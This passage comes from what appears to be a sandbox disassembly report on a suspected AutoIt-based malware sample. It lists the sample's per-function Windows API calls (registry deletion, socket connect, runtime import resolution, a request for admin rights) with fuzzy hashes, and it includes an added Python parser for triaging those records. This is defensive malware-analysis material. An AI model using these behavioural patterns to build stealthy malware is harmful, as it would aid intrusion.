• IsMenu.USER32(?), ref: 00A97369
• InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00A973B1
• DrawMenuBar.USER32 ref: 00A973C4
Strings
Similarity
• API ID: Menu$Item$DrawInfoInsert_memset
• String ID: 0
• API String ID: 3866635326-4108050209
                                                                                              APIs
                                                                                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00A90FD4
                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00A90FFE
                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00A910B5
                                                                                                • Part of subcall function 00A90FA5: RegCloseKey.ADVAPI32(?), ref: 00A9101B
                                                                                                • Part of subcall function 00A90FA5: FreeLibrary.KERNEL32(?), ref: 00A9106D
                                                                                                • Part of subcall function 00A90FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00A91090
                                                                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 00A91058
                                                                                              Similarity
                                                                                              • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                                              • String ID:
                                                                                              • API String ID: 395352322-0
                                                                                              • Opcode ID: d0135b5244a5906d81b43129ec115fbc3e0629bc1c421702071733e7184997d4
                                                                                              • Instruction ID: bb13edd31b8fa35955f0baeab67a0a37ceef950da99dd8c73ca7672e9c0c435e
                                                                                              • Opcode Fuzzy Hash: d0135b5244a5906d81b43129ec115fbc3e0629bc1c421702071733e7184997d4
                                                                                              • Instruction Fuzzy Hash: 2A31EBB1A01109BFDF15DF94DC89EFFB7BCEF08350F10016AE512E2151EA759E859AA0
                                                                                              APIs
                                                                                              • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00A962EC
                                                                                              • GetWindowLongW.USER32(010E5838,000000F0), ref: 00A9631F
                                                                                              • GetWindowLongW.USER32(010E5838,000000F0), ref: 00A96354
                                                                                              • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00A96386
                                                                                              • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00A963B0
                                                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 00A963C1
                                                                                              • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00A963DB
                                                                                              Similarity
                                                                                              • API ID: LongWindow$MessageSend
                                                                                              • String ID:
                                                                                              • API String ID: 2178440468-0
                                                                                              • Opcode ID: 3ac93ea58e93dce64a0b6fe9471f9035ef425abb7c7510e021c751f0789c8758
                                                                                              • Instruction ID: 2c862e428284e2a21f767c84a8ec797db0bba8bd7a3dbf2735b65bee763bc8a6
                                                                                              • Opcode Fuzzy Hash: 3ac93ea58e93dce64a0b6fe9471f9035ef425abb7c7510e021c751f0789c8758
                                                                                              • Instruction Fuzzy Hash: 1C31F034744250AFDF21CFA9DC85F5A37E1BB5A714F1901A6F601CF2B2CB71A841AB50
                                                                                              APIs
                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00A6DB2E
                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00A6DB54
                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 00A6DB57
                                                                                              • SysAllocString.OLEAUT32(?), ref: 00A6DB75
                                                                                              • SysFreeString.OLEAUT32(?), ref: 00A6DB7E
                                                                                              • StringFromGUID2.OLE32(?,?,00000028), ref: 00A6DBA3
                                                                                              • SysAllocString.OLEAUT32(?), ref: 00A6DBB1
                                                                                              Similarity
                                                                                              • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                              • String ID:
                                                                                              • API String ID: 3761583154-0
                                                                                              • Opcode ID: a71097fbd6a00350979eb2aee69a37e112fba71725431388ad4c53a89addba31
                                                                                              • Instruction ID: e390c8cdb201934f1cb8bcafa666122d41713b14af5b5f5e4b69d639abdcaecf
                                                                                              • Opcode Fuzzy Hash: a71097fbd6a00350979eb2aee69a37e112fba71725431388ad4c53a89addba31
                                                                                              • Instruction Fuzzy Hash: F4216276B00219AFDF10EFA8DC88CBB77BCEB093A0B158566F954DB254DA709C4187A4
                                                                                              APIs
                                                                                                • Part of subcall function 00A87D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00A87DB6
                                                                                              • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00A861C6
                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00A861D5
                                                                                              • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00A8620E
                                                                                              • connect.WSOCK32(00000000,?,00000010), ref: 00A86217
                                                                                              • WSAGetLastError.WSOCK32 ref: 00A86221
                                                                                              • closesocket.WSOCK32(00000000), ref: 00A8624A
                                                                                              • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00A86263
                                                                                              Similarity
                                                                                              • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                                                              • String ID:
                                                                                              • API String ID: 910771015-0
                                                                                              • Opcode ID: 48d7bf54aea72864f93ce49482a03131295d9d26415eeb0a4d26475a649f0789
                                                                                              • Instruction ID: 4a350043690b1bfe70a0f5b4983c5d1519d6c9192b7ef891e2563b11e9bdc51d
                                                                                              • Opcode Fuzzy Hash: 48d7bf54aea72864f93ce49482a03131295d9d26415eeb0a4d26475a649f0789
                                                                                              • Instruction Fuzzy Hash: 6D319C31600108AFEF10AF64CC89BFE7BACEB45761F048069F905E7292DB70AD45CBA1
                                                                                              APIs
                                                                                              Similarity
                                                                                              • API ID: __wcsnicmp
                                                                                              • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                              • API String ID: 1038674560-2734436370
                                                                                              • Opcode ID: f72ae8550b81d166d74b9686f6360d5a5ec0ffdb8cd37db2573acbeba0029b45
                                                                                              • Instruction ID: 6f49049879a0ebf2997884ff31565b384f4abf1fdcef363372e469aa52bdac88
                                                                                              • Opcode Fuzzy Hash: f72ae8550b81d166d74b9686f6360d5a5ec0ffdb8cd37db2573acbeba0029b45
                                                                                              • Instruction Fuzzy Hash: E82146B22042517ED620EB34FD03FA773B8EF56340F14443AF85687091EB519D82C3A5
                                                                                              APIs
                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00A6DC09
                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00A6DC2F
                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 00A6DC32
                                                                                              • SysAllocString.OLEAUT32 ref: 00A6DC53
                                                                                              • SysFreeString.OLEAUT32 ref: 00A6DC5C
                                                                                              • StringFromGUID2.OLE32(?,?,00000028), ref: 00A6DC76
                                                                                              • SysAllocString.OLEAUT32(?), ref: 00A6DC84
                                                                                              Similarity
                                                                                              • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                              • String ID:
                                                                                              • API String ID: 3761583154-0
                                                                                              • Opcode ID: a5c7aec572280546764d946bbc06d9ad38045c22c3a5ca61687424e9781c0cc4
                                                                                              • Instruction ID: 5b3cea7979b8731caa558cab5f1c283ec85dd6fededd794a74a44f1f3344bd2c
                                                                                              • Opcode Fuzzy Hash: a5c7aec572280546764d946bbc06d9ad38045c22c3a5ca61687424e9781c0cc4
                                                                                              • Instruction Fuzzy Hash: CB213135704208AFDB10DFF8DC88DAA77BCEB493A0B108126F914DB261DA709C41C764
                                                                                              APIs
                                                                                                • Part of subcall function 00A11D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00A11D73
                                                                                                • Part of subcall function 00A11D35: GetStockObject.GDI32(00000011), ref: 00A11D87
                                                                                                • Part of subcall function 00A11D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00A11D91
                                                                                              • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00A97632
                                                                                              • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00A9763F
                                                                                              • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00A9764A
                                                                                              • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00A97659
                                                                                              • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00A97665
                                                                                              Similarity
                                                                                              • API ID: MessageSend$CreateObjectStockWindow
                                                                                              • String ID: Msctls_Progress32
                                                                                              • API String ID: 1025951953-3636473452
                                                                                              • Opcode ID: 414c0f85f7723ac48fbf2e32100b02ed0d1a5cb7b833142305fa340b77510ce0
                                                                                              • Instruction ID: ec1ad7d465c7998b79f70206eaf77381039c2d603d650efa5fe7dcce62f26020
                                                                                              • Opcode Fuzzy Hash: 414c0f85f7723ac48fbf2e32100b02ed0d1a5cb7b833142305fa340b77510ce0
                                                                                              • Instruction Fuzzy Hash: 7D11B6B1210219BFEF118F64CC85EEB7F6DEF08798F114115B704A6050CB729C21DBA4
                                                                                              APIs
                                                                                              • __init_pointers.LIBCMT ref: 00A39AE6
                                                                                                • Part of subcall function 00A33187: EncodePointer.KERNEL32(00000000), ref: 00A3318A
                                                                                                • Part of subcall function 00A33187: __initp_misc_winsig.LIBCMT ref: 00A331A5
                                                                                                • Part of subcall function 00A33187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00A39EA0
                                                                                                • Part of subcall function 00A33187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00A39EB4
                                                                                                • Part of subcall function 00A33187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00A39EC7
                                                                                                • Part of subcall function 00A33187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00A39EDA
                                                                                                • Part of subcall function 00A33187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00A39EED
  • Part of subcall function 00A33187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00A39F00
  • Part of subcall function 00A33187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00A39F13
  • Part of subcall function 00A33187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00A39F26
  • Part of subcall function 00A33187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00A39F39
  • Part of subcall function 00A33187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00A39F4C
  • Part of subcall function 00A33187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00A39F5F
  • Part of subcall function 00A33187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00A39F72
  • Part of subcall function 00A33187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00A39F85
  • Part of subcall function 00A33187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00A39F98
  • Part of subcall function 00A33187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00A39FAB
  • Part of subcall function 00A33187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00A39FBE
• __mtinitlocks.LIBCMT ref: 00A39AEB
• __mtterm.LIBCMT ref: 00A39AF4
  • Part of subcall function 00A39B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00A39AF9,00A37CD0,00ACA0B8,00000014), ref: 00A39C56
  • Part of subcall function 00A39B5C: _free.LIBCMT ref: 00A39C5D
  • Part of subcall function 00A39B5C: DeleteCriticalSection.KERNEL32(00ACEC00,?,?,00A39AF9,00A37CD0,00ACA0B8,00000014), ref: 00A39C7F
• __calloc_crt.LIBCMT ref: 00A39B19
• __initptd.LIBCMT ref: 00A39B3B
• GetCurrentThreadId.KERNEL32 ref: 00A39B42
Memory Dump Source
• Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
• Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
Similarity
• API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
• String ID:
• API String ID: 3567560977-0
• Opcode ID: e7d7d9af26476c6d6f7966cdc8924649ebec2d95a1b6a107538f2d62fd606871
• Instruction ID: 83e4012287b3500060473333726f23aeb5581a942c08cca2397b31add1b9ad0b
• Opcode Fuzzy Hash: e7d7d9af26476c6d6f7966cdc8924649ebec2d95a1b6a107538f2d62fd606871
• Instruction Fuzzy Hash: 80F0B432A0D7116AFA34BBB4BD03A4BB694DF027B0F200B1AF460C50D2FFE0844241A0
APIs
• LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00A33F85), ref: 00A34085
• GetProcAddress.KERNEL32(00000000), ref: 00A3408C
• EncodePointer.KERNEL32(00000000), ref: 00A34097
• DecodePointer.KERNEL32(00A33F85), ref: 00A340B2
Strings
Memory Dump Source
• Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
• Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
Similarity
• API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
• String ID: RoUninitialize$combase.dll
• API String ID: 3489934621-2819208100
• Opcode ID: 283c04dfeaa54879acad28cfc33c096a0c13facbe0d4e148234f8d38cbc456e1
• Instruction ID: 6dc8378af0b84bddd0d362c7f0a77f0e8e983708b9a4d828434a0b060790b637
• Opcode Fuzzy Hash: 283c04dfeaa54879acad28cfc33c096a0c13facbe0d4e148234f8d38cbc456e1
• Instruction Fuzzy Hash: FFE09A75642302AFEE10DFE5EC09B453BA4BB05742F104526F512F50A0CFBA96028B15
APIs
Memory Dump Source
• Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
• Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
Similarity
• API ID: _memmove$__itow__swprintf
• String ID:
• API String ID: 3253778849-0
• Opcode ID: 9863102e03c29a5e0e466ba8f1401a9340df7fcea8e799d8c2f609bfb2f3a253
• Instruction ID: 693241ffe4a85ccc6fc8a54a27bb57bcd9e4b2e61294b3c080cdd26a118775f1
• Opcode Fuzzy Hash: 9863102e03c29a5e0e466ba8f1401a9340df7fcea8e799d8c2f609bfb2f3a253
• Instruction Fuzzy Hash: 78618B30A0065A9BCF05EF60CE92FFE37A9AF05308F448529F8596B192DB35E946DB50
APIs
  • Part of subcall function 00A17DE1: _memmove.LIBCMT ref: 00A17E22
  • Part of subcall function 00A90E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00A8FDAD,?,?), ref: 00A90E31
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A902BD
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00A902FD
• RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00A90320
• RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00A90349
• RegCloseKey.ADVAPI32(?,?,00000000), ref: 00A9038C
• RegCloseKey.ADVAPI32(00000000), ref: 00A90399
Memory Dump Source
• Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
• Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
Similarity
• API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
• String ID:
• API String ID: 4046560759-0
• Opcode ID: b74d63c1aa15ac6eca22f39628f480092ca8466ba65ef2631580a54e2d61c07b
• Instruction ID: 43a07b17df4a16275a2058593328ab67f355208017fc63226b7ceb9659db02b1
• Opcode Fuzzy Hash: b74d63c1aa15ac6eca22f39628f480092ca8466ba65ef2631580a54e2d61c07b
• Instruction Fuzzy Hash: 0D511631208204AFCB14EB64C995EAFBBE9FF84354F04492DF5958B2A2DB31E945CB52
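The per-function records in this report are the raw material for triage (which functions touch the registry, which resolve imports at run time, which fuzzy hashes to pivot on), but the listing is only readable by eye. The script below is an added example, not part of the Joe Sandbox report or its tooling: it parses one record into structured API calls and key/value metadata, using the registry-enumeration function directly above as constructed sample input. The line grammar it assumes (a bullet, an optional "Part of subcall function ADDR:" prefix, then `Name.MODULE(args), ref: ADDR` with the argument list optional) is inferred from this page alone.

```python
import re
from collections import Counter
from dataclasses import dataclass
from typing import Optional

# Constructed sample input: one per-function record copied from the report above
# (the AutoIt registry-enumeration routine), trimmed to the lines the parser uses.
SAMPLE = """\
APIs
  • Part of subcall function 00A17DE1: _memmove.LIBCMT ref: 00A17E22
  • Part of subcall function 00A90E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00A8FDAD,?,?), ref: 00A90E31
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A902BD
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00A902FD
• RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00A90320
• RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00A90349
• RegCloseKey.ADVAPI32(?,?,00000000), ref: 00A9038C
• RegCloseKey.ADVAPI32(00000000), ref: 00A90399
Memory Dump Source
• Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
Similarity
• API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
• String ID:
• API String ID: 4046560759-0
• Opcode ID: b74d63c1aa15ac6eca22f39628f480092ca8466ba65ef2631580a54e2d61c07b
• Instruction Fuzzy Hash: 0D511631208204AFCB14EB64C995EAFBBE9FF84354F04492DF5958B2A2DB31E945CB52
"""

# One API-call line. The argument list is optional: "GetCurrentThreadId.KERNEL32 ref: ..."
# has none, "RegOpenKeyExW.ADVAPI32(...), ref: ..." has one (assumed grammar, see lead-in).
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}): )?"
    r"(?P<name>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\),)?"
    r" ref: (?P<ref>[0-9A-F]{8})\s*$"
)
# Metadata lines such as "• Opcode ID: ..." or "• API String ID: ..."; the key is
# letters and spaces only, so API-call lines (which contain "." and "(") never match.
FIELD_RE = re.compile(r"^\s*•\s*(?P<key>[A-Za-z][A-Za-z ]*?):\s*(?P<val>.*?)\s*$")


@dataclass(frozen=True)
class ApiCall:
    name: str
    module: str
    args: tuple
    ref: str                  # address of the call site inside the function
    subcall: Optional[str]    # callee address when the call is attributed to a subroutine


def parse_record(text: str) -> dict:
    """Split one function record into its API calls and its key/value metadata."""
    calls, fields = [], {}
    for line in text.splitlines():
        m = API_RE.match(line)
        if m:
            args = tuple(m["args"].split(",")) if m["args"] is not None else ()
            calls.append(ApiCall(m["name"], m["mod"], args, m["ref"], m["sub"]))
            continue
        f = FIELD_RE.match(line)
        if f:
            fields[f["key"]] = f["val"]
    return {"apis": calls, "fields": fields}


def direct_calls(calls):
    """Calls made by the function itself, excluding those attributed to subroutines."""
    return [c for c in calls if c.subcall is None]


def module_histogram(calls) -> Counter:
    """How many calls land in each DLL / CRT module; ADVAPI32-heavy functions are registry code."""
    return Counter(c.module for c in calls)


def call_sequence(calls):
    """Direct calls ordered by call-site address, the shape an API-sequence rule matches on."""
    return [c.name for c in sorted(direct_calls(calls), key=lambda c: int(c.ref, 16))]


if __name__ == "__main__":
    rec = parse_record(SAMPLE)
    print(" -> ".join(call_sequence(rec["apis"])))
    print(dict(module_histogram(rec["apis"])))
    print(rec["fields"]["Instruction Fuzzy Hash"])
```

Run over every record of the report, `call_sequence` gives the per-function API order (here `RegConnectRegistryW -> RegOpenKeyExW -> RegCloseKey -> RegEnumValueW -> ...`) that a sequence-based rule can match, and the `Opcode ID` / `Instruction Fuzzy Hash` fields are what you pivot on to find the same routine in other samples.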
APIs
• GetMenu.USER32(?), ref: 00A957FB
• GetMenuItemCount.USER32(00000000), ref: 00A95832
• GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00A9585A
• GetMenuItemID.USER32(?,?), ref: 00A958C9
• GetSubMenu.USER32(?,?), ref: 00A958D7
• PostMessageW.USER32(?,00000111,?,00000000), ref: 00A95928
Memory Dump Source
• Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
• Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
Similarity
• API ID: Menu$Item$CountMessagePostString
• String ID:
• API String ID: 650687236-0
• Opcode ID: 6e46b4f9b75660ffad057ff8929a2ccd085c48551204d520e8572566cd694a45
• Instruction ID: d93da07ebd96ca4dc6191afe3df33f77e301a266bf80897e463d8b5d9e200f04
• Opcode Fuzzy Hash: 6e46b4f9b75660ffad057ff8929a2ccd085c48551204d520e8572566cd694a45
• Instruction Fuzzy Hash: 82513C35E00615AFDF11EFA4C956AAEBBF4EF48310F108065E845AB351CB74AE41DB90
APIs
• VariantInit.OLEAUT32(?), ref: 00A6EF06
• VariantClear.OLEAUT32(00000013), ref: 00A6EF78
• VariantClear.OLEAUT32(00000000), ref: 00A6EFD3
• _memmove.LIBCMT ref: 00A6EFFD
• VariantClear.OLEAUT32(?), ref: 00A6F04A
• VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00A6F078
Memory Dump Source
• Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
• Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
Similarity
• API ID: Variant$Clear$ChangeInitType_memmove
• String ID:
• API String ID: 1101466143-0
• Opcode ID: 04901f7f607b399c2b531f4e72bf27fb8776752f9171843108e50316416ed40c
• Instruction ID: 6fd6255073818e5b2e359e7d813e1f1c8b6f4a81ca1f61a1f2291f675318491e
• Opcode Fuzzy Hash: 04901f7f607b399c2b531f4e72bf27fb8776752f9171843108e50316416ed40c
• Instruction Fuzzy Hash: 1D5168B5A00209EFCB14CF58D880AAAB7B8FF4C314B15856AE959DB341E734E911CBA0
APIs
• _memset.LIBCMT ref: 00A72258
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00A722A3
• IsMenu.USER32(00000000), ref: 00A722C3
• CreatePopupMenu.USER32 ref: 00A722F7
• GetMenuItemCount.USER32(000000FF), ref: 00A72355
• InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00A72386
Memory Dump Source
• Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
• Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
Similarity
• API ID: Menu$Item$CountCreateInfoInsertPopup_memset
• String ID:
• API String ID: 3311875123-0
• Opcode ID: 489431e581cc27eb605b5e2c687e1651ecbd5b4727833a891fea4ccdb8e8f086
• Instruction ID: 45f7b6fd8ed9c3d401b8da37197fe79b0054622f97e3bb5ff6f1f699ea752e8a
• Opcode Fuzzy Hash: 489431e581cc27eb605b5e2c687e1651ecbd5b4727833a891fea4ccdb8e8f086
• Instruction Fuzzy Hash: 3651CD70600249EFDF21CF68CD88BAEBBF5BF05318F10C22AE859AB291D7748904CB51
APIs
  • Part of subcall function 00A12612: GetWindowLongW.USER32(?,000000EB), ref: 00A12623
• BeginPaint.USER32(?,?,?,?,?,?), ref: 00A1179A
• GetWindowRect.USER32(?,?), ref: 00A117FE
• ScreenToClient.USER32(?,?), ref: 00A1181B
• SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00A1182C
• EndPaint.USER32(?,?), ref: 00A11876
Memory Dump Source
• Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
• Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
Similarity
• API ID: PaintWindow$BeginClientLongRectScreenViewport
• String ID:
• API String ID: 1827037458-0
• Opcode ID: 9f92903ce398e080c078aad13ecafd9f4688dd93a6ce7c310e3c290018eab252
• Instruction ID: c8b19eae3d32cb88a863c01d0d1069e64406da1eee068f085318b9d2f5d4d48c
• Opcode Fuzzy Hash: 9f92903ce398e080c078aad13ecafd9f4688dd93a6ce7c310e3c290018eab252
• Instruction Fuzzy Hash: 734192715047409FD710DF64CC84FBA7BF8EB45724F144629FAA5C72A1C7309886EB61
                                                                                              APIs
                                                                                              • ShowWindow.USER32(00AD57B0,00000000,010E5838,?,?,00AD57B0,?,00A9B5A8,?,?), ref: 00A9B712
                                                                                              • EnableWindow.USER32(00000000,00000000), ref: 00A9B736
                                                                                              • ShowWindow.USER32(00AD57B0,00000000,010E5838,?,?,00AD57B0,?,00A9B5A8,?,?), ref: 00A9B796
                                                                                              • ShowWindow.USER32(00000000,00000004,?,00A9B5A8,?,?), ref: 00A9B7A8
                                                                                              • EnableWindow.USER32(00000000,00000001), ref: 00A9B7CC
                                                                                              • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00A9B7EF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmp
